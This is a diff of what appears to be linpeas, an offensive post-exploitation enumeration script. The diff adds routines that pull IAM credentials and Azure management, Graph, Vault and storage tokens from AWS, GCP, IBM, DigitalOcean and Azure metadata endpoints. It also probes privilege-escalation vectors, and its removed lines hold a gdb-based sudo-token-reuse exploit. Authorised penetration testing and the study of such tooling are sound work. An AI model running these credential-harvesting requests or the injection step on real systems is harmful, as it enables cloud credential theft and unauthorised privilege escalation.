"s,/Yes,${SED_RED}," - print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," - print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED}," fi echo "" @@ -1901,7 +1945,7 @@ if [ "$inContainer" ]; then echo "" print_2title "Kubernetes Information" - print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod" + print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod" print_3title "Kubernetes service account folder" @@ -1913,7 +1957,7 @@ if [ "$inContainer" ]; then echo "" print_3title "Current sa user k8s permissions" - print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles" + print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes" kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \ "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \ -X 'POST' -H 'Content-Type: application/json' \ @@ -1927,7 +1971,9 @@ if [ "$inContainer" ]; then if [ "$(command -v capsh)" ]; then capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" else - cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" + defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap" + cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" + echo $ITALIC"Run capsh --decode= to decode the capabilities"$NC fi echo "" @@ -1968,7 +2014,10 @@ GCP_BAD_SCOPES="/cloud-platform|/compute" exec_with_jq(){ if [ "$(command -v jq)" ]; then - $@ | jq; + $@ | jq 2>/dev/null; + if ! [ $? -eq 0 ]; then + $@; + fi else $@; fi @@ -1981,6 +2030,24 @@ check_gcp(){ fi } +check_do(){ + is_do="No" + if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then + is_do="Yes" + fi +} + +check_ibm_vm(){ + is_ibm_vm="No" + if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then + curl --connect-timeout 2 "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" > /dev/null 2>&1 + if [ "$?" -eq 0 ]; then + IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) ) + is_ibm_vm="Yes" + fi + fi +} + check_aws_ecs(){ is_aws_ecs="No" if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then @@ -1995,11 +2062,6 @@ check_aws_ecs(){ elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then is_aws_ecs="Yes"; - - - elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then - is_aws_ecs="Yes"; - fi if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then @@ -2009,6 +2071,7 @@ check_aws_ecs(){ check_aws_ec2(){ is_aws_ec2="No" + is_aws_ec2_beanstalk="No" if [ -d "/var/log/amazon/" ]; then is_aws_ec2="Yes" @@ -2020,6 +2083,10 @@ check_aws_ec2(){ is_aws_ec2="Yes" fi fi + + if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then + is_aws_ec2_beanstalk="Yes" + fi } check_aws_lambda(){ @@ -2030,6 +2097,33 @@ check_aws_lambda(){ fi } +check_aws_codebuild(){ + is_aws_codebuild="No" + + if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then + is_aws_codebuild="Yes" + fi +} + +check_az_vm(){ + is_az_vm="No" + + if [ -d "/var/log/azure/" ]; then + is_az_vm="Yes" + + elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then + is_az_vm="Yes" + fi +} + +check_az_app(){ + is_az_app="No" + + if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then + is_az_app="Yes" + fi +} + check_gcp print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," @@ -2037,8 +2131,19 @@ check_aws_ecs print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_ec2 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_lambda print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_aws_codebuild +print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_do +print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_ibm_vm +print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_az_vm +print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_az_app +print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," echo "" @@ -2052,10 +2157,10 @@ if [ "$is_gcp" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi - + # GCP Enumeration if [ "$gcp_req" ]; then - print_2title "Google CLoud Platform Enumeration" - print_info "https://book.hacktricks.xyz/cloud-security/gcp-security" + print_2title "Google Cloud Platform Enumeration" + print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security" ## GC Project Info p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') @@ -2118,6 +2223,11 @@ if [ "$is_gcp" = "Yes" ]; then echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network") echo " ============== " done + + echo "" + print_3title "User Data" + echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script") + echo "" echo "" print_3title "Service Accounts" @@ -2133,7 +2243,7 @@ if [ "$is_gcp" = "Yes" ]; then fi fi - +# AWS ECS Enumeration if [ "$is_aws_ecs" = "Yes" ]; then print_2title "AWS ECS Enumeration" @@ -2167,6 +2277,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then fi fi +# AWS EC2 Enumeration if [ "$is_aws_ec2" = "Yes" ]; then print_2title "AWS EC2 Enumeration" @@ -2220,10 +2331,18 @@ if [ "$is_aws_ec2" = "Yes" ]; then echo "" print_3title "User Data" - eval $aws_req "http://169.254.169.254/latest/user-data" + eval $aws_req "http://169.254.169.254/latest/user-data"; echo "" + + echo "" + echo "EC2 Security Credentials" + exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo "" + + print_3title "SSM Runnig" + ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED}," fi fi +# AWS Lambda Enumeration if [ "$is_aws_lambda" = "Yes" ]; then print_2title "AWS Lambda Enumeration" printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME @@ -2236,6 +2355,166 @@ if [ "$is_aws_lambda" = "Yes" ]; then printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi +# AWS Codebuild Enumeration +if [ "$is_aws_codebuild" = "Yes" ]; then + print_2title "AWS Codebuild Enumeration" + + aws_req="" + if [ "$(command -v curl)" ]; then + aws_req="curl -s -f" + elif [ "$(command -v wget)" ]; then + aws_req="wget -q -O -" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + echo "The addresses are in /codebuild/output/tmp/env.sh" + fi + + if [ "$aws_req" ]; then + print_3title "Credentials" + CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2) + URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig + exec_with_jq eval $aws_req "$URL_CREDS"; echo "" + + print_3title "Container Info" + METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2) + exec_with_jq eval $aws_req "$METADATA_URL"; echo "" + fi +fi + +# DO Droplet Enumeration +if [ "$is_do" = "Yes" ]; then + print_2title "DO Droplet Enumeration" + + do_req="" + if [ "$(command -v curl)" ]; then + do_req='curl -s -f ' + elif [ "$(command -v wget)" ]; then + do_req='wget -q -O - ' + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$do_req" ]; then + URL="http://169.254.169.254/metadata" + printf "Id: "; eval $do_req "$URL/v1/id"; echo "" + printf "Region: "; eval $do_req "$URL/v1/region"; echo "" + printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo "" + printf "User data: "; eval $do_req "$URL/v1/user-data"; echo "" + printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo "" + printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces"; + printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip"; + printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip"; + printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags"; + printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features"; + fi +fi + +# IBM Cloud Enumeration +if [ "$is_ibm_vm" = "Yes" ]; then + print_2title "IBM Cloud Enumeration" + + if ! [ "$IBM_TOKEN" ]; then + echo "Couldn't get the metadata token:(" + + else + TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" + ACCEPT_HEADER="Accept: application/json" + URL="http://169.254.169.254/latest/meta-data" + + ibm_req="" + if [ "$(command -v curl)" ]; then + ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + elif [ "$(command -v wget)" ]; then + ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$ibm_req" ]; then + print_3title "Instance Details" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" + + print_3title "Keys and User data" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" + + print_3title "Placement Groups" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" + + print_3title "IAM credentials" + exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" + fi + fi + +fi + +# Azure VM Enumeration +if [ "$is_az_vm" = "Yes" ]; then + print_2title "Azure VM Enumeration" + + HEADER="Metadata:true" + URL="http://169.254.169.254/metadata" + API_VERSION="2021-12-13" # https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions + + az_req="" + if [ "$(command -v curl)" ]; then + az_req="curl -s -f -H '$HEADER'" + elif [ "$(command -v wget)" ]; then + az_req="wget -q -O - -H '$HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$az_req" ]; then + print_3title "Instance details" + exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION" + + print_3title "Load Balancer details" + exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION" + + print_3title "Management token" + exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/" + + print_3title "Graph token" + exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" + + print_3title "Vault token" + exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/" + + print_3title "Storage token" + exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/" + fi +fi + +if [ "$check_az_app" = "Yes" ]; then + print_2title "Azure App Service Enumeration" + echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)" + + HEADER="secret:$IDENTITY_HEADER" + + az_req="" + if [ "$(command -v curl)" ]; then + az_req="curl -s -f -H '$HEADER'" + elif [ "$(command -v wget)" ]; then + az_req="wget -q -O - -H '$HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$az_req" ]; then + print_3title "Management token" + exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/" + + print_3title "Graph token" + exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/" + + print_3title "Vault token" + exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/" + + print_3title "Storage token" + exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/" + fi +fi fi echo '' @@ -2252,13 +2531,18 @@ print_title "Processes, Crons, Timers, Services and Sockets" if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Cleaned proccesses print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" + if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then + echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users" + fi + if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," pslist=$(print_ps) else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do @@ -2288,6 +2572,33 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +CURRENT_USER_PIVOT_PID="" +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then + #-- PCS) Process opened by other users + print_2title "Processes whose PPID belongs to a different user (not root)" + print_info "You will know if a user can somehow spawn processes as a different user" + + # Function to get user by PID + get_user_by_pid() { + ps -p "$1" -o user | grep -v "USER" + } + + # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user + ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do + if [ "$ppid" = "0" ]; then + continue + fi + ppid_user=$(get_user_by_pid "$ppid") + if echo "$user" | grep -Eqv "$ppid_user|root$"; then + echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + if [ "$ppid_user" = "$USER" ]; then + CURRENT_USER_PIVOT_PID="$ppid" + fi + fi + done + echo "" +fi + if ! [ "$SEARCH_IN_FOLDER" ]; then #-- PCS) Files opened by processes belonging to other users if ! [ "$IAMROOT" ]; then @@ -2317,7 +2628,13 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + if [ "$(ps -e -o user,command 2>/dev/null)" ]; then + for i in $(seq 1 1210); do + ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; + done; + sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; + rm "$temp_file"; + fi echo "" fi fi @@ -2355,7 +2672,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then program="" program=$(defaults read "$f" Program 2>/dev/null) if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) fi if [ -w "$program" ]; then echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; @@ -2419,12 +2736,12 @@ printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do fi done relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null) if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},"; else - echo "$s is executing some relative path" + echo "$s could be executing some relative path" fi fi fi @@ -2495,6 +2812,7 @@ if ! [ "$IAMROOT" ]; then if ! [ "$unix_scks_list" ];then unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) fi + unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") fi if ! [ "$SEARCH_IN_FOLDER" ]; then @@ -2505,7 +2823,7 @@ if ! [ "$IAMROOT" ]; then fi # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do perms="" if [ -r "$l" ]; then perms="Read " @@ -2619,7 +2937,7 @@ fi #-- NI) Interfaces print_2title "Interfaces" cat /etc/networks 2>/dev/null -(ifconfig || ip a) 2>/dev/null +(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null echo "" #-- NI) Neighbours @@ -2649,7 +2967,7 @@ fi #-- NI) Ports print_2title "Active Ports" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports" -( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g" echo "" #-- NI) MacOS hardware ports @@ -2820,7 +3138,7 @@ if [ "$MACPEAS" ];then print_2title "SystemKey" ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then + if [ -r "/var/db/SystemKey" ]; then echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi @@ -2863,10 +3181,10 @@ fi if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi -for filename in '/etc/sudoers.d/*'; do +for filename in /etc/sudoers.d/*; do if [ -r "$filename" ]; then echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" fi done echo "" @@ -2875,35 +3193,37 @@ echo "" print_2title "Checking sudo tokens" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens" ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" -if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; -else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; -fi -is_gdb="$(command -v gdb 2>/dev/null)" -if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; -else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; -fi -if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then + echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g"; + + if [ "$(command -v gdb 2>/dev/null)" ]; then + echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; fi + + if [ "$CURRENT_USER_PIVOT_PID" ]; then + echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g"; + fi + + if [ -f "$HOME/.sudo_as_admin_successful" ]; then + echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},"; + fi + + if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then + echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g"; + ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' + fi + +else + echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; + fi echo "" #-- UI) Doas -if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," else echo_not_found "doas.conf" fi @@ -3007,8 +3327,7 @@ if [ "$EXTRA_CHECKS" ]; then fi #-- UI) Brute su -EXISTS_SUDO="$(command -v sudo 2>/dev/null)" -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ 